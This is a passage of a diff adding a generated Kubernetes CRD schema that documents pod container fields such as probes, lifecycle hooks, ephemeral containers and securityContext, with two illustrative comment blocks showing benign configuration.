+ Will be truncated by the node if greater than + 4096 bytes. The total message length across all + containers will be limited to 12kb. Defaults to + /dev/termination-log. Cannot be updated.' + type: string + terminationMessagePolicy: + description: Indicate how the termination message + should be populated. File will use the contents + of terminationMessagePath to populate the container + status message on both success and failure. FallbackToLogsOnError + will use the last chunk of container log output + if the termination message file is empty and the + container exited with an error. The log output + is limited to 2048 bytes or 80 lines, whichever + is smaller. Defaults to File. Cannot be updated. + type: string + tty: + description: Whether this container should allocate + a TTY for itself, also requires 'stdin' to be + true. Default is false. + type: boolean + volumeDevices: + description: volumeDevices is the list of block + devices to be used by the container. + items: + description: volumeDevice describes a mapping + of a raw block device within a container. + properties: + devicePath: + description: devicePath is the path inside + of the container that the device will be + mapped to. + type: string + name: + description: name must match the name of a + persistentVolumeClaim in the pod + type: string + required: + - devicePath + - name + type: object + type: array + volumeMounts: + description: Pod volumes to mount into the container's + filesystem. Cannot be updated. + items: + description: VolumeMount describes a mounting + of a Volume within a container. + properties: + mountPath: + description: Path within the container at + which the volume should be mounted. Must + not contain ':'. + type: string + mountPropagation: + description: mountPropagation determines how + mounts are propagated from the host to container + and the other way around. When not set, + MountPropagationNone is used. This field + is beta in 1.10. + type: string + name: + description: This must match the Name of a + Volume. + type: string + readOnly: + description: Mounted read-only if true, read-write + otherwise (false or unspecified). Defaults + to false. + type: boolean + subPath: + description: Path within the volume from which + the container's volume should be mounted. + Defaults to "" (volume's root). + type: string + subPathExpr: + description: Expanded path within the volume + from which the container's volume should + be mounted. Behaves similarly to SubPath + but environment variable references $(VAR_NAME) + are expanded using the container's environment. + Defaults to "" (volume's root). SubPathExpr + and SubPath are mutually exclusive. + type: string + required: + - mountPath + - name + type: object + type: array + workingDir: + description: Container's working directory. If not + specified, the container runtime's default will + be used, which might be configured in the container + image. Cannot be updated. + type: string + required: + - name + type: object + type: array + dnsConfig: + description: Specifies the DNS parameters of a pod. Parameters + specified here will be merged to the generated DNS configuration + based on DNSPolicy. + properties: + nameservers: + description: A list of DNS name server IP addresses. + This will be appended to the base nameservers generated + from DNSPolicy. Duplicated nameservers will be removed. + items: + type: string + type: array + options: + description: A list of DNS resolver options. 
This + will be merged with the base options generated from + DNSPolicy. Duplicated entries will be removed. Resolution + options given in Options will override those that + appear in the base DNSPolicy. + items: + description: PodDNSConfigOption defines DNS resolver + options of a pod. + properties: + name: + description: Required. + type: string + value: + type: string + type: object + type: array + searches: + description: A list of DNS search domains for host-name + lookup. This will be appended to the base search + paths generated from DNSPolicy. Duplicated search + paths will be removed. + items: + type: string + type: array + type: object + dnsPolicy: + description: Set DNS policy for the pod. Defaults to "ClusterFirst". + Valid values are 'ClusterFirstWithHostNet', 'ClusterFirst', + 'Default' or 'None'. DNS parameters given in DNSConfig + will be merged with the policy selected with DNSPolicy. + To have DNS options set along with hostNetwork, you + have to specify DNS policy explicitly to 'ClusterFirstWithHostNet'. + type: string + enableServiceLinks: + description: 'EnableServiceLinks indicates whether information + about services should be injected into pod''s environment + variables, matching the syntax of Docker links. Optional: + Defaults to true.' + type: boolean + ephemeralContainers: + description: List of ephemeral containers run in this + pod. Ephemeral containers may be run in an existing + pod to perform user-initiated actions such as debugging. + This list cannot be specified when creating a pod, and + it cannot be modified by updating the pod spec. In order + to add an ephemeral container to an existing pod, use + the pod's ephemeralcontainers subresource. This field + is alpha-level and is only honored by servers that enable + the EphemeralContainers feature. + items: + description: An EphemeralContainer is a container that + may be added temporarily to an existing pod for user-initiated + activities such as debugging. Ephemeral containers + have no resource or scheduling guarantees, and they + will not be restarted when they exit or when a pod + is removed or restarted. If an ephemeral container + causes a pod to exceed its resource allocation, the + pod may be evicted. Ephemeral containers may not be + added by directly updating the pod spec. They must + be added via the pod's ephemeralcontainers subresource, + and they will appear in the pod spec once added. This + is an alpha feature enabled by the EphemeralContainers + feature flag. + properties: + args: + description: 'Arguments to the entrypoint. The docker + image''s CMD is used if this is not provided. + Variable references $(VAR_NAME) are expanded using + the container''s environment. If a variable cannot + be resolved, the reference in the input string + will be unchanged. Double $$ are reduced to a + single $, which allows for escaping the $(VAR_NAME) + syntax: i.e. "$$(VAR_NAME)" will produce the string + literal "$(VAR_NAME)". Escaped references will + never be expanded, regardless of whether the variable + exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + command: + description: 'Entrypoint array. Not executed within + a shell. The docker image''s ENTRYPOINT is used + if this is not provided. Variable references $(VAR_NAME) + are expanded using the container''s environment. 
+ If a variable cannot be resolved, the reference + in the input string will be unchanged. Double + $$ are reduced to a single $, which allows for + escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" + will produce the string literal "$(VAR_NAME)". + Escaped references will never be expanded, regardless + of whether the variable exists or not. Cannot + be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + env: + description: List of environment variables to set + in the container. Cannot be updated. + items: + description: EnvVar represents an environment + variable present in a Container. + properties: + name: + description: Name of the environment variable. + Must be a C_IDENTIFIER. + type: string + value: + description: 'Variable references $(VAR_NAME) + are expanded using the previously defined + environment variables in the container and + any service environment variables. If a + variable cannot be resolved, the reference + in the input string will be unchanged. Double + $$ are reduced to a single $, which allows + for escaping the $(VAR_NAME) syntax: i.e. + "$$(VAR_NAME)" will produce the string literal + "$(VAR_NAME)". Escaped references will never + be expanded, regardless of whether the variable + exists or not. Defaults to "".' + type: string + valueFrom: + description: Source for the environment variable's + value. Cannot be used if value is not empty. + properties: + configMapKeyRef: + description: Selects a key of a ConfigMap. + properties: + key: + description: The key to select. + type: string + name: + description: 'Name of the referent. + More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap + or its key must be defined + type: boolean + required: + - key + type: object + fieldRef: + description: 'Selects a field of the pod: + supports metadata.name, metadata.namespace, + `metadata.labels[''<KEY>'']`, `metadata.annotations[''<KEY>'']`, + spec.nodeName, spec.serviceAccountName, + status.hostIP, status.podIP, status.podIPs.' + properties: + apiVersion: + description: Version of the schema + the FieldPath is written in terms + of, defaults to "v1". + type: string + fieldPath: + description: Path of the field to + select in the specified API version. + type: string + required: + - fieldPath + type: object + resourceFieldRef: + description: 'Selects a resource of the + container: only resources limits and + requests (limits.cpu, limits.memory, + limits.ephemeral-storage, requests.cpu, + requests.memory and requests.ephemeral-storage) + are currently supported.' + properties: + containerName: + description: 'Container name: required + for volumes, optional for env vars' + type: string + divisor: + anyOf: + - type: integer + - type: string + description: Specifies the output + format of the exposed resources, + defaults to "1" + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + resource: + description: 'Required: resource to + select' + type: string + required: + - resource + type: object + secretKeyRef: + description: Selects a key of a secret + in the pod's namespace + properties: + key: + description: The key of the secret + to select from. Must be a valid + secret key.
+ type: string + name: + description: 'Name of the referent. + More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the Secret + or its key must be defined + type: boolean + required: + - key + type: object + type: object + required: + - name + type: object + type: array + envFrom: + description: List of sources to populate environment + variables in the container. The keys defined within + a source must be a C_IDENTIFIER. All invalid keys + will be reported as an event when the container + is starting. When a key exists in multiple sources, + the value associated with the last source will + take precedence. Values defined by an Env with + a duplicate key will take precedence. Cannot be + updated. + items: + description: EnvFromSource represents the source + of a set of ConfigMaps + properties: + configMapRef: + description: The ConfigMap to select from + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap + must be defined + type: boolean + type: object + prefix: + description: An optional identifier to prepend + to each key in the ConfigMap. Must be a + C_IDENTIFIER. + type: string + secretRef: + description: The Secret to select from + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the Secret + must be defined + type: boolean + type: object + type: object + type: array + image: + description: 'Docker image name. More info: https://kubernetes.io/docs/concepts/containers/images' + type: string + imagePullPolicy: + description: 'Image pull policy. One of Always, + Never, IfNotPresent. Defaults to Always if :latest + tag is specified, or IfNotPresent otherwise. Cannot + be updated. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images' + type: string + lifecycle: + description: Lifecycle is not allowed for ephemeral + containers. + properties: + postStart: + description: 'PostStart is called immediately + after a container is created. If the handler + fails, the container is terminated and restarted + according to its restart policy. Other management + of the container blocks until the hook completes. + More info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the + action to take. + properties: + command: + description: Command is the command + line to execute inside the container, + the working directory for the command is + root ('/') in the container's filesystem. + The command is simply exec'd, it is + not run inside a shell, so traditional + shell instructions ('|', etc) won't + work. To use a shell, you need to + explicitly call out to that shell. + Exit status of 0 is treated as live/healthy + and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http + request to perform. 
+ properties: + host: + description: Host name to connect to, + defaults to the pod IP. You probably + want to set "Host" in httpHeaders + instead. + type: string + httpHeaders: + description: Custom headers to set in + the request. HTTP allows repeated + headers. + items: + description: HTTPHeader describes + a custom header to be used in HTTP + probes + properties: + name: + description: The header field + name + type: string + value: + description: The header field + value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet + supported TODO: implement a realistic + TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to + connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + preStop: + description: 'PreStop is called immediately + before a container is terminated due to an + API request or management event such as liveness/startup + probe failure, preemption, resource contention, + etc. The handler is not called if the container + crashes or exits. The reason for termination + is passed to the handler. The Pod''s termination + grace period countdown begins before the PreStop + hook is executed. Regardless of the outcome + of the handler, the container will eventually + terminate within the Pod''s termination grace + period. Other management of the container + blocks until the hook completes or until the + termination grace period is reached. More + info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the + action to take. + properties: + command: + description: Command is the command + line to execute inside the container, + the working directory for the command is + root ('/') in the container's filesystem. + The command is simply exec'd, it is + not run inside a shell, so traditional + shell instructions ('|', etc) won't + work. To use a shell, you need to + explicitly call out to that shell. + Exit status of 0 is treated as live/healthy + and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http + request to perform. + properties: + host: + description: Host name to connect to, + defaults to the pod IP. You probably + want to set "Host" in httpHeaders + instead. + type: string + httpHeaders: + description: Custom headers to set in + the request. HTTP allows repeated + headers.
+ items: + description: HTTPHeader describes + a custom header to be used in HTTP + probes + properties: + name: + description: The header field + name + type: string + value: + description: The header field + value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet + supported TODO: implement a realistic + TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to + connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + type: object + livenessProbe: + description: Probes are not allowed for ephemeral + containers. + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the action + to take. + properties: + command: + description: Command is the command line + to execute inside the container, the working + directory for the command is root ('/') + in the container's filesystem. The command + is simply exec'd, it is not run inside + a shell, so traditional shell instructions + ('|', etc) won't work. To use a shell, + you need to explicitly call out to that + shell. Exit status of 0 is treated as + live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for + the probe to be considered failed after having + succeeded. Defaults to 3. Minimum value is + 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request + to perform. + properties: + host: + description: Host name to connect to, defaults + to the pod IP. You probably want to set + "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the + request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom + header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container + has started before liveness probes are initiated. 
More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform + the probe. Defaults to 10 seconds. Minimum + value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for + the probe to be considered successful after + having failed. Defaults to 1. Must be 1 for + liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet supported + TODO: implement a realistic TCP lifecycle + hook' + properties: + host: + description: 'Optional: Host name to connect + to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the + pod needs to terminate gracefully upon probe + failure. The grace period is the duration + in seconds after the processes running in + the pod are sent a termination signal and + the time when the processes are forcibly halted + with a kill signal. Set this value longer + than the expected cleanup time for your process. + If this value is nil, the pod's terminationGracePeriodSeconds + will be used. Otherwise, this value overrides + the value provided by the pod spec. Value + must be a non-negative integer. The value zero + indicates stop immediately via the kill signal + (no opportunity to shut down). This is a beta + field and requires enabling ProbeTerminationGracePeriod + feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds + is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which + the probe times out. Defaults to 1 second. + Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + name: + description: Name of the ephemeral container specified + as a DNS_LABEL. This name must be unique among + all containers, init containers and ephemeral + containers. + type: string + ports: + description: Ports are not allowed for ephemeral + containers. + items: + description: ContainerPort represents a network + port in a single container. + properties: + containerPort: + description: Number of port to expose on the + pod's IP address. This must be a valid port + number, 0 < x < 65536. + format: int32 + type: integer + hostIP: + description: What host IP to bind the external + port to. + type: string + hostPort: + description: Number of port to expose on the + host. If specified, this must be a valid + port number, 0 < x < 65536. If HostNetwork + is specified, this must match ContainerPort. + Most containers do not need this. + format: int32 + type: integer + name: + description: If specified, this must be an + IANA_SVC_NAME and unique within the pod. + Each named port in a pod must have a unique + name. Name for the port that can be referred + to by services. + type: string + protocol: + default: TCP + description: Protocol for port. Must be UDP, + TCP, or SCTP. Defaults to "TCP".
+ type: string + required: + - containerPort + type: object + type: array + readinessProbe: + description: Probes are not allowed for ephemeral + containers. + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the action + to take. + properties: + command: + description: Command is the command line + to execute inside the container, the working + directory for the command is root ('/') + in the container's filesystem. The command + is simply exec'd, it is not run inside + a shell, so traditional shell instructions + ('|', etc) won't work. To use a shell, + you need to explicitly call out to that + shell. Exit status of 0 is treated as + live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for + the probe to be considered failed after having + succeeded. Defaults to 3. Minimum value is + 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request + to perform. + properties: + host: + description: Host name to connect to, defaults + to the pod IP. You probably want to set + "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the + request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom + header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container + has started before liveness probes are initiated. + More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform + the probe. Defaults to 10 seconds. Minimum + value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for + the probe to be considered successful after + having failed. Defaults to 1. Must be 1 for + liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet supported + TODO: implement a realistic TCP lifecycle + hook' + properties: + host: + description: 'Optional: Host name to connect + to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the + pod needs to terminate gracefully upon probe + failure.
The grace period is the duration + in seconds after the processes running in + the pod are sent a termination signal and + the time when the processes are forcibly halted + with a kill signal. Set this value longer + than the expected cleanup time for your process. + If this value is nil, the pod's terminationGracePeriodSeconds + will be used. Otherwise, this value overrides + the value provided by the pod spec. Value + must be a non-negative integer. The value zero + indicates stop immediately via the kill signal + (no opportunity to shut down). This is a beta + field and requires enabling ProbeTerminationGracePeriod + feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds + is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which + the probe times out. Defaults to 1 second. + Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + resources: + description: Resources are not allowed for ephemeral + containers. Ephemeral containers use spare resources + already allocated to the pod. + properties: + limits: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Limits describes the maximum amount + of compute resources allowed. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + requests: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Requests describes the minimum + amount of compute resources required. If Requests + is omitted for a container, it defaults to + Limits if that is explicitly specified, otherwise + to an implementation-defined value. More info: + https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + type: object + securityContext: + description: 'Optional: SecurityContext defines + the security options the ephemeral container should + be run with. If set, the fields of SecurityContext + override the equivalent fields of PodSecurityContext.' + properties: + allowPrivilegeEscalation: + description: 'AllowPrivilegeEscalation controls + whether a process can gain more privileges + than its parent process. This bool directly + controls if the no_new_privs flag will be + set on the container process. AllowPrivilegeEscalation + is true always when the container is: 1) run + as Privileged 2) has CAP_SYS_ADMIN' + type: boolean + capabilities: + description: The capabilities to add/drop when + running containers. Defaults to the default + set of capabilities granted by the container + runtime. + properties: + add: + description: Added capabilities + items: + description: Capability represents POSIX + capabilities type + type: string + type: array + drop: + description: Removed capabilities + items: + description: Capability represents POSIX + capabilities type + type: string + type: array + type: object + privileged: + description: Run container in privileged mode. + Processes in privileged containers are essentially + equivalent to root on the host. Defaults to + false.
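+                          # Illustrative sketch (comment only, not part of the generated
+                          # schema): a securityContext combining the fields above; the
+                          # capability names are examples.
+                          #   securityContext:
+                          #     allowPrivilegeEscalation: false
+                          #     privileged: false
+                          #     capabilities:
+                          #       add: ["NET_BIND_SERVICE"]
+                          #       drop: ["ALL"]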
+ type: boolean + procMount: + description: procMount denotes the type of proc + mount to use for the containers. The default + is DefaultProcMount which uses the container + runtime defaults for readonly paths and masked + paths. This requires the ProcMountType feature + flag to be enabled. + type: string + readOnlyRootFilesystem: + description: Whether this container has a read-only + root filesystem. Default is false. + type: boolean + runAsGroup: + description: The GID to run the entrypoint of + the container process. Uses runtime default + if unset. May also be set in PodSecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + format: int64 + type: integer + runAsNonRoot: + description: Indicates that the container must + run as a non-root user. If true, the Kubelet + will validate the image at runtime to ensure + that it does not run as UID 0 (root) and fail + to start the container if it does. If unset + or false, no such validation will be performed. + May also be set in PodSecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + type: boolean + runAsUser: + description: The UID to run the entrypoint of + the container process. Defaults to user specified + in image metadata if unspecified. May also + be set in PodSecurityContext. If set in both + SecurityContext and PodSecurityContext, the + value specified in SecurityContext takes precedence. + format: int64 + type: integer + seLinuxOptions: + description: The SELinux context to be applied + to the container. If unspecified, the container + runtime will allocate a random SELinux context + for each container. May also be set in PodSecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + properties: + level: + description: Level is SELinux level label + that applies to the container. + type: string + role: + description: Role is a SELinux role label + that applies to the container. + type: string + type: + description: Type is a SELinux type label + that applies to the container. + type: string + user: + description: User is a SELinux user label + that applies to the container. + type: string + type: object + seccompProfile: + description: The seccomp options to use by this + container. If seccomp options are provided + at both the pod & container level, the container + options override the pod options. + properties: + localhostProfile: + description: localhostProfile indicates + a profile defined in a file on the node + should be used. The profile must be preconfigured + on the node to work. Must be a descending + path, relative to the kubelet's configured + seccomp profile location. Must only be + set if type is "Localhost". + type: string + type: + description: "type indicates which kind + of seccomp profile will be applied. Valid + options are: \n Localhost - a profile + defined in a file on the node should be + used. RuntimeDefault - the container runtime + default profile should be used. Unconfined + - no profile should be applied." + type: string + required: + - type + type: object + windowsOptions: + description: The Windows specific settings applied + to all containers. If unspecified, the options + from the PodSecurityContext will be used. + If set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. 
+ properties: + gmsaCredentialSpec: + description: GMSACredentialSpec is where + the GMSA admission webhook (https://github.com/kubernetes-sigs/windows-gmsa) + inlines the contents of the GMSA credential + spec named by the GMSACredentialSpecName + field. + type: string + gmsaCredentialSpecName: + description: GMSACredentialSpecName is the + name of the GMSA credential spec to use. + type: string + hostProcess: + description: HostProcess determines if a + container should be run as a 'Host Process' + container. This field is alpha-level and + will only be honored by components that + enable the WindowsHostProcessContainers + feature flag. Setting this field without + the feature flag will result in errors + when validating the Pod. All of a Pod's + containers must have the same effective + HostProcess value (it is not allowed to + have a mix of HostProcess containers and + non-HostProcess containers). In addition, + if HostProcess is true then HostNetwork + must also be set to true. + type: boolean + runAsUserName: + description: The UserName in Windows to + run the entrypoint of the container process. + Defaults to the user specified in image + metadata if unspecified. May also be set + in PodSecurityContext. If set in both + SecurityContext and PodSecurityContext, + the value specified in SecurityContext + takes precedence. + type: string + type: object + type: object + startupProbe: + description: Probes are not allowed for ephemeral + containers. + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the action + to take. + properties: + command: + description: Command is the command line + to execute inside the container, the working + directory for the command is root ('/') + in the container's filesystem. The command + is simply exec'd, it is not run inside + a shell, so traditional shell instructions + ('|', etc) won't work. To use a shell, + you need to explicitly call out to that + shell. Exit status of 0 is treated as + live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for + the probe to be considered failed after having + succeeded. Defaults to 3. Minimum value is + 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request + to perform. + properties: + host: + description: Host name to connect to, defaults + to the pod IP. You probably want to set + "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the + request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom + header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container + has started before liveness probes are initiated. 
More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform + the probe. Defaults to 10 seconds. Minimum + value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for + the probe to be considered successful after + having failed. Defaults to 1. Must be 1 for + liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet supported + TODO: implement a realistic TCP lifecycle + hook' + properties: + host: + description: 'Optional: Host name to connect + to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the + pod needs to terminate gracefully upon probe + failure. The grace period is the duration + in seconds after the processes running in + the pod are sent a termination signal and + the time when the processes are forcibly halted + with a kill signal. Set this value longer + than the expected cleanup time for your process. + If this value is nil, the pod's terminationGracePeriodSeconds + will be used. Otherwise, this value overrides + the value provided by the pod spec. Value + must be a non-negative integer. The value zero + indicates stop immediately via the kill signal + (no opportunity to shut down). This is a beta + field and requires enabling ProbeTerminationGracePeriod + feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds + is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which + the probe times out. Defaults to 1 second. + Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + stdin: + description: Whether this container should allocate + a buffer for stdin in the container runtime. If + this is not set, reads from stdin in the container + will always result in EOF. Default is false. + type: boolean + stdinOnce: + description: Whether the container runtime should + close the stdin channel after it has been opened + by a single attach. When stdin is true the stdin + stream will remain open across multiple attach + sessions. If stdinOnce is set to true, stdin is + opened on container start, is empty until the + first client attaches to stdin, and then remains + open and accepts data until the client disconnects, + at which time stdin is closed and remains closed + until the container is restarted. If this flag + is false, a container process that reads from + stdin will never receive an EOF. Default is false. + type: boolean + targetContainerName: + description: If set, the name of the container from + PodSpec that this ephemeral container targets. + The ephemeral container will be run in the namespaces + (IPC, PID, etc) of this container. If not set + then the ephemeral container is run in whatever + namespaces are shared for the pod. Note that the + container runtime must support this feature.
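+                      # Illustrative sketch (comment only, not part of the generated
+                      # schema): ephemeral containers are added via the pod's
+                      # ephemeralcontainers subresource, e.g. with kubectl debug;
+                      # the pod and container names here are hypothetical.
+                      #   kubectl debug mypod -it --image=busybox --target=myapp
+                      # produces an entry roughly like:
+                      #   ephemeralContainers:
+                      #   - name: debugger-abc12
+                      #     image: busybox
+                      #     targetContainerName: myapp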
+ type: string + terminationMessagePath: + description: 'Optional: Path at which the file to + which the container''s termination message will + be written is mounted into the container''s filesystem. + Message written is intended to be brief final + status, such as an assertion failure message. + Will be truncated by the node if greater than + 4096 bytes. The total message length across all + containers will be limited to 12kb. Defaults to + /dev/termination-log. Cannot be updated.' + type: string + terminationMessagePolicy: + description: Indicate how the termination message + should be populated. File will use the contents + of terminationMessagePath to populate the container + status message on both success and failure. FallbackToLogsOnError + will use the last chunk of container log output + if the termination message file is empty and the + container exited with an error. The log output + is limited to 2048 bytes or 80 lines, whichever + is smaller. Defaults to File. Cannot be updated. + type: string + tty: + description: Whether this container should allocate + a TTY for itself, also requires 'stdin' to be + true. Default is false. + type: boolean + volumeDevices: + description: volumeDevices is the list of block + devices to be used by the container. + items: + description: volumeDevice describes a mapping + of a raw block device within a container. + properties: + devicePath: + description: devicePath is the path inside + of the container that the device will be + mapped to. + type: string + name: + description: name must match the name of a + persistentVolumeClaim in the pod + type: string + required: + - devicePath + - name + type: object + type: array + volumeMounts: + description: Pod volumes to mount into the container's + filesystem. Cannot be updated. + items: + description: VolumeMount describes a mounting + of a Volume within a container. + properties: + 